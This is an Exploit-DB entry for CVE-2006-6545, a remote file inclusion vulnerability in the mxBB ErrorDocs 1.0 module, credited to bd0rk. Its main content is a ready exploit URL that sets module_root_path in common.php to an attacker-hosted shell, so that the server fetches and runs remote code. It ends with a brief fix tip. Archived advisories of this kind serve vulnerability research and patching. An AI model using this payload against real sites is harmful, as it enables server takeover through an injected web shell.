mxBB Module ErrorDocs 1.0 common.php Remote Inclusion Vulnerability

2006-12-11T00:00:00
ID EDB-ID:2917
Type exploitdb
Reporter bd0rk
Modified 2006-12-11T00:00:00

Description

mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability. CVE-2006-6545. Webapps exploit for php platform

                                        
                                            => mxBB Module mx_errordocs 1.0 Remote File Include Vulnerability

=> Mod-Download: http://forums.phpmix.org/download.php?id=27

=> Bugfounder: bd0rk || SOH-Crew

=> Vulnerable code in common.php

=> Greetings: str0ke, broken-error, Martn & m0rphin

[+] Exploit: http://[target]/[patH]/includes/common.php?module_root_path=YouRSheLL?

=> Special Fixtip: Declare $module_root_path or use Hacking Attempt

# milw0rm.com [2006-12-11]